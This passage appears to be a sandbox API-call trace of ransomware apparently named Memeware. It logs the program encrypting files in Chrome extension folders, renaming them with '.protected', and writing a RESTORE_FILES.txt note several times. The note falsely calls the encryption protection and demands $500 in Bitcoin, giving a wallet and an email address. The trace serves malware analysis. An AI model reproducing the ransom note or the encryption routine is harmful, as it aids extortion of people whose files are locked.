lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.774] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.774] CloseHandle (hObject=0x164) returned 1 [0080.774] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.protected") returned 170 [0080.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0080.774] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0080.774] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0080.774] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.774] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0080.775] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0080.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.775] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0080.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.775] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0080.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0080.775] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0080.775] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.777] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.777] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.777] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.777] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.777] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.777] CloseHandle (hObject=0x164) returned 1 [0080.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.protected") returned 172 [0080.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.protected")) returned 1 [0080.778] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.778] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.778] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0080.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.786] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.786] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.787] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.787] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.787] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.788] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.788] CloseHandle (hObject=0x160) returned 1 [0080.788] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0080.788] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0080.788] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\RESTORE_FILES.txt") returned 147 [0080.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0080.788] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.788] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0080.789] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.789] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0080.789] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.789] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0080.789] CloseHandle (hObject=0x15c) returned 1 [0080.790] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0080.790] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0080.790] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt") returned 141 [0080.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0080.791] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.791] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0080.792] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.792] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0080.792] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.792] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0080.792] CloseHandle (hObject=0x158) returned 1 [0080.792] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="Windows") returned -1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="Program Files") returned -1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="Program Files (x86)") returned -1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="$Recycle.bin") returned 1 [0080.792] lstrcmpiW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="System Volume Information") returned -1 [0080.792] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda") returned 123 [0080.792] lstrcmpW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2=".") returned 1 [0080.792] lstrcmpW (lpString1="nmmhkkegccagdldgiimedpiccmgmieda", lpString2="..") returned 1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*") returned 125 [0080.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0080.793] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.793] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.793] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.793] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.793] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\.") returned 125 [0080.793] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.793] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.793] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.793] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.793] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.793] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.793] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\..") returned 126 [0080.793] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.793] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.793] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="Windows") returned -1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="Program Files") returned -1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="Program Files (x86)") returned -1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="$Recycle.bin") returned 1 [0080.793] lstrcmpiW (lpString1="1.0.0.2_0", lpString2="System Volume Information") returned -1 [0080.793] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0") returned 133 [0080.793] lstrcmpW (lpString1="1.0.0.2_0", lpString2=".") returned 1 [0080.793] lstrcmpW (lpString1="1.0.0.2_0", lpString2="..") returned 1 [0080.794] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*") returned 135 [0080.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0080.799] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.799] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.799] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.799] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\.") returned 135 [0080.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.799] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.799] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.799] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.800] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.800] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, 